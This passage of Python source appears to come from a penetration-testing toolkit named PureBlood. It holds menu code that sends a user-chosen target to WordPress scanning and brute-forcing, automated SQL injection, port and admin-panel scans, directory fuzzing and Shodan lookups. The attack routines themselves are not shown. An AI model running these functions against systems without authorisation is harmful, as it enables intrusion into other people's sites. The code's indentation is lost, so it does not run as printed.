print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}WebApplicationAttack{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
cweb_application_atttack = WebApplicationAttack()
if choice == 1:
print ("""{3}[ {5}Web Application Attack {3}]
{2}01{3}) {5}WPScan (Kali Linux) - Install manually on other OS
{2}02{3}) {5}WPScan Bruteforce (Kali Linux) - Install manually on other OS
{2}03{3}) {5}Wordpress Plugins Vulnerability Checker
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice1 = int(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif sys.version_info[0] == 2:
try:
choice1 = int(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Wordpress{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
if choice1 == 1:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan = cweb_application_atttack.wp_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
elif choice1 == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wp_scan_bruteforce = cweb_application_atttack.wp_scan_bruteforce(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 3: # Exploit-DB.com
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_wordpress_plugin_checker = cweb_application_atttack.wordpress_vulnerability_check(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice1 == 90:
main()
elif choice1 == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
set_target(target, 2)
elif choice1 == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
elif choice == 2:
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
try:
wap_auto_sql_injection = cweb_application_atttack.auto_sql_injection(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
print ('')
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
print ('')
web_application_attack()
elif choice == 90:
main()
elif choice == 95:
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
print ('')
set_target(target, 2)
elif choice == 99:
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
else:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid choice!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_application_attack()
def web_pentest():
global web_pentest_output
global web_pentest_outputfile
print ("""{3}[ {5}Web Pentest {3}]
{2}01{3}) {5}Banner Grab
{2}02{3}) {5}Whois
{2}03{3}) {5}Traceroute
{2}04{3}) {5}DNS Record
{2}05{3}) {5}Reverse DNS Lookup
{2}06{3}) {5}Zone Transfer Lookup
{2}07{3}) {5}Port Scan
{2}08{3}) {5}Admin Panel Scan
{2}09{3}) {5}Subdomain Scan
{2}10{3}) {5}CMS Identify
{2}11{3}) {5}Reverse IP Lookup
{2}12{3}) {5}Subnet Lookup
{2}13{3}) {5}Extract Page Links
{2}14{3}) {5}Directory Fuzz
{2}15{3}) {5}File Fuzz
{2}16{3}) {5}Shodan Search
{2}17{3}) {5}Shodan Host Lookup
{2}90{3}) {5}Back To Menu
{2}95{3}) {5}Set Target
{2}99{3}) {5}Exit
{0}""".format(reset, red, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
try:
choice = int(input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
elif sys.version_info[0] == 2:
try:
choice = int(raw_input('{0}PureBlood{1}({3}WebPentest{1})> {2}'.format(green, blue, cyan, red)))
except KeyboardInterrupt:
try:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
except:
pass
print ('\n{2}[{1}+{2}] {3}- {1}Exiting!{0}'.format(reset, red, blue, yellow))
sys.exit()
except ValueError:
print ('\n{2}[{1}+{2}] {3}- {1}Please enter a valid number!{0}'.format(reset, red, blue, yellow))
time.sleep(2)
print ('')
web_pentest()
cweb_pentest = WebPentest()
if choice == 1:
try:
wp_banner_grab = cweb_pentest.banner_grab(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Banner Grab Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_banner_grab)
web_pentest_outputfile.write('\n' + wp_banner_grab)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 2:
try:
wp_whois = cweb_pentest.whois(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Whois Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_whois)
web_pentest_outputfile.write('\n' + str(wp_whois))
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 3:
try:
wp_traceroute = cweb_pentest.traceroute(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Traceroute Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_traceroute)
web_pentest_outputfile.write('\n' + wp_traceroute)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 4:
try:
wp_dns_record = cweb_pentest.dns_record(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] DNS Record Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_dns_record:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 5:
try:
wp_reverse_dns_lookup = cweb_pentest.reverse_dns_lookup(ip)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse DNS Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_dns_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_dns_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 6:
try:
wp_zone_transfer_lookup = cweb_pentest.zone_transfer_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Zone Transfer Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_zone_transfer_lookup)
web_pentest_outputfile.write('\n' + wp_zone_transfer_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 7:
if sys.version_info[0] == 3:
port_end = int(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
port_end = int(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}PortScan{1}>({3}Port End{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_port_scan = cweb_pentest.port_scan(hostname, port_end)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Port Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_port_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 8:
try:
wp_admin_panel_scan = cweb_pentest.admin_panel_scan(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Admin Panel Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in wp_admin_panel_scan:
print (i)
web_pentest_outputfile.write(str(i) + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 9:
if sys.version_info[0] == 3:
subdomain_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
subdomain_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubdomainScan{1}>({3}Subdomain List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subdomain_scan = cweb_pentest.subdomain_scan(hostname, subdomain_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
so_200, so_301, so_302, so_403 = wp_subdomain_scan
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Subdomain Scan Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
for i in so_200:
print ('[+] 200 - ' + i)
web_pentest_outputfile.write('[+] 200 - ' + i + '\n')
for i in so_301:
print ('[!] 301 - ' + i)
web_pentest_outputfile.write('[+] 301 - ' + i + '\n')
for i in so_302:
print ('[!] 302 - ' + i)
web_pentest_outputfile.write('[+] 302 - ' + i + '\n')
for i in so_403:
print ('[!] 403 - ' + i)
web_pentest_outputfile.write('[+] 403 - ' + i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 10:
try:
wp_cms_detect = cweb_pentest.cms_detect(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] CMS Detect - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_cms_detect)
web_pentest_outputfile.write('\n' + wp_cms_detect)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 11:
try:
wp_reverse_ip_lookup = cweb_pentest.reverse_ip_lookup(hostname)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Reverse IP Lookup Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_reverse_ip_lookup)
web_pentest_outputfile.write('\n' + wp_reverse_ip_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 12:
if sys.version_info[0] == 3:
subnet_input = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
subnet_input = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}SubnetLookup{1}>({3}CIDR or IP with NetMask{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_subnet_lookup = cweb_pentest.subnet_lookup(subnet_input)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print (wp_subnet_lookup)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 13:
try:
wp_links_extract = cweb_pentest.links_extract(url)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Links Extract Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
print (wp_links_extract)
web_pentest_outputfile.write('\n' + wp_links_extract)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 14:
if sys.version_info[0] == 3:
directory_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
directory_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}DirectoryFuzz{1}>({3}Directory List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_directory_fuzz1, wp_directory_fuzz2, wp_directory_fuzz3 = cweb_pentest.directory_fuzz(url, directory_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] Directory Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_directory_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_directory_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('[+] Response 403:\n')
print ('[+] Response 403')
for i in wp_directory_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 15:
if sys.version_info[0] == 3:
file_list = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
file_list = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}FileFuzz{1}>({3}File List{1})> {2}'.format(green, blue, cyan, red)))
try:
wp_file_fuzz1, wp_file_fuzz2, wp_file_fuzz3 = cweb_pentest.file_fuzz(url, file_list)
except NameError:
print ('\n{2}[{1}!{2}] {3}- {4}Please set the target first. {1}95{2}) {4}Set Target{0}'.format(reset, green, blue, yellow, cyan))
time.sleep(2)
web_pentest()
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('[+] File Fuzz Result - ' + url)
web_pentest_outputfile.write('\n============================================================')
print (reset + bold)
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('Response 200:\n')
print ('[+] Response 200')
for i in wp_file_fuzz1:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 301 / 302:\n')
print ('[+] Response 301 / 302')
for i in wp_file_fuzz2:
print (i)
web_pentest_outputfile.write(i + '\n')
web_pentest_outputfile.write('Response 403:\n')
print ('[+] Response 403')
for i in wp_file_fuzz3:
print (i)
web_pentest_outputfile.write(i + '\n')
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest_outputfile.write('\n')
web_pentest_outputfile.write('============================================================\n')
web_pentest()
elif choice == 16:
if sys.version_info[0] == 3:
shodan_search_query = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_search_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename:
shodan_search_output_filename = shodan_search_output_filename + '.txt'
else:
shodan_search_output_filename = shodan_search_output_filename
if sys.version_info[0] == 2:
shodan_search_query = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Query{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_search_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_search_output_filename:
shodan_search_output_filename = shodan_search_output_filename + '.txt'
else:
shodan_search_output_filename = shodan_search_output_filename
shodan_search_output = open('outputs/web_pentest/shodan/' + shodan_search_output_filename, 'a+')
shodan_search_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_search = cweb_pentest.shodan_search(shodan_search_query, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ('------------------------------.\n{1}[{2}#{1}] {3}- {4}Results Found: {5}|\n------------------------------.{0}'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
shodan_search_output.write('\n------------------------------.\n[#] - Results Found: {5}|\n------------------------------.\n'.format(reset, blue, green, yellow, cyan, str(wp_shodan_search['total'])))
for i in wp_shodan_search['matches']:
try:
print ("""{6}[{7}#{6}] {8}- {9}Timestamp:{10} {0}
{6}[{7}+{6}] {8}- {9}IP:{10} {1}
{6}[{7}+{6}] {8}- {9}Port:{10} {2}
{6}[{7}+{6}] {8}- {9}OS:{10} {3}
{6}[{7}+{6}] {8}- {9}Hostnames:{10} {4}
{6}[{7}+{6}] {8}- {9}Data:{10}
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
shodan_search_output.write("""[#] - Timestamp: {0}
[+] - IP: {1}
[+] - Port: {2}
[+] - OS: {3}
[+] - Hostnames: {4}
[+] - Data:
{5}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(i['timestamp'], i['ip_str'], str(i['port']), i['os'], i['hostnames'], i['data'], blue, green, yellow, cyan, reset))
except:
pass
shodan_search_output.write('\n\n')
shodan_search_output.close()
print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_search_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 17:
if sys.version_info[0] == 3:
shodan_host = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_host_lookup_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
else:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
if sys.version_info[0] == 2:
shodan_host = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Host{1})> {2}'.format(green, blue, cyan, red)))
SHODAN_API_KEY = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Shodan API Key{1})> {2}'.format(green, blue, cyan, red)))
shodan_host_lookup_output_filename = str(input('{0}PureBlood{1}>{0}WebPentest{1}>{0}ShodanSearch{1}>({3}Output{1})> {2}'.format(green, blue, cyan, red)))
if '.txt' not in shodan_host_lookup_output_filename:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename + '.txt'
else:
shodan_host_lookup_output_filename = shodan_host_lookup_output_filename
shodan_host_lookup_output = open('outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename, 'a+')
shodan_host_lookup_output.write('[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
wp_shodan_host_lookup = cweb_pentest.shodan_host_lookup(shodan_host, SHODAN_API_KEY)
print ('{0}='.format(red) * int(sizex))
print (reset + bold)
print ("""--------------------------.\n{1}[{2}#{1}] {3}- {4}General Information:{0}|\n--------------------------.
{1}[{2}#{1}] {3}- {4}IP:{0} {5}
{1}[{2}#{1}] {3}- {4}Ports:{0} {6}
{1}[{2}#{1}] {3}- {4}Tags:{0} {7}
{1}[{2}#{1}] {3}- {4}City:{0} {8}
{1}[{2}#{1}] {3}- {4}Country:{0} {9}
{1}[{2}#{1}] {3}- {4}Organization:{0} {10}
{1}[{2}#{1}] {3}- {4}ISP:{0} {11}
{1}[{2}#{1}] {3}- {4}Last Update:{0} {12}
{1}[{2}#{1}] {3}- {4}Hostnames:{0} {13}
{1}[{2}#{1}] {3}- {4}ASN:{0} {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
shodan_host_lookup_output.write("""--------------------------.\n[#] - General Information:|\n--------------------------.
[#] - IP: {5}
[#] - Ports: {6}
[#] - Tags: {7}
[#] - City: {8}
[#] - Country: {9}
[#] - Organization: {10}
[#] - ISP: {11}
[#] - Last Update: {12}
[#] - Hostnames: {13}
[#] - ASN: {14}
""".format(reset, blue, green, yellow, cyan, wp_shodan_host_lookup['ip_str'], str(wp_shodan_host_lookup['ports']).replace('[','').replace(']',''), str(wp_shodan_host_lookup['tags']).replace('[','').replace(']',''), wp_shodan_host_lookup.get('city', 'N/A'), wp_shodan_host_lookup.get('country_name', 'N/A'), wp_shodan_host_lookup.get('org', 'N/A'), wp_shodan_host_lookup.get('isp', 'N/A'), wp_shodan_host_lookup.get('last_update', 'N/A'), str(wp_shodan_host_lookup.get('hostnames', 'N/A')).replace('[','').replace(']',''), wp_shodan_host_lookup.get('asn', 'N/A')))
print ('------------------------.\n{1}[{2}#{1}] {3}- {4}Services / Banner:|\n------------------------.{0}'.format(reset, blue, green, yellow, cyan))
shodan_host_lookup_output.write('\n------------------------.\n[#] - Services / Banner:|\n------------------------.\n'.format(reset, blue, green, yellow, cyan))
for i in wp_shodan_host_lookup['data']:
print ("""{1}[{2}#{1}] {3}- {4}Timestamp:{0} {5}
{1}[{2}+{1}] {3}- {4}Port:{0} {6}
{1}[{2}+{1}] {3}- {4}Transport:{0} {7}
{1}[{2}+{1}] {3}- {4}Data:{0}
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write("""[#] - Timestamp: {5}
[+] - Port: {6}
[+] - Transport: {7}
[+] - Data:
{8}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n""".format(reset, blue, green, yellow, cyan, i['timestamp'], i['port'], i['transport'], i['data']))
shodan_host_lookup_output.write('\n\n')
shodan_host_lookup_output.close()
print ('\n[+] - Output saved in outputs/web_pentest/shodan/' + shodan_host_lookup_output_filename)
print (reset)
print ('{0}='.format(red) * int(sizex))
web_pentest()
elif choice == 90:
main()
elif choice == 95:
print ('{2}[{1}#{2}] {3}- {4}Please don\'t put "/" in the end of the Target.{0}'.format(reset, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if sys.version_info[0] == 2:
target = str(raw_input('{0}PureBlood{1}>{0}WebPentest{1}>({3}Target{1})> {2}'.format(green, blue, cyan, red)))
if '://' in target:
ohostname = target.replace('https://', '').replace('http://', '')
else:
ohostname = target
web_pentest_output = ohostname + '-' + month + mday + '.txt'
web_pentest_outputfile = open('outputs/web_pentest/' + web_pentest_output, 'a+')
web_pentest_outputfile.write('\n\n\n[#] - ' + month + ' ' + mday + ' ' + current_time + '\n')
set_target(target, 1)
elif choice == 99:
print ('\n[+] - Output saved in outputs/web_pentest/' + web_pentest_output)
